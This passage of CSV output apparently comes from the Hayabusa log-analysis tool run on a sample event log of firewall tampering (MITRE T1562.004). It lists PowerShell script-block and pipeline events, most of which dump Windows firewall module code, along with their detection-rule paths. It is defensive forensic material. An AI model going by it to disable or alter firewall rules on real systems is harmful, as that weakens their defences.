-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.642 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.652 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.653 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.654 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.654 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.655 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.655 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.656 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.658 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.659 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.660 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if 
($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.Contains",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, 
[Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = 
${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
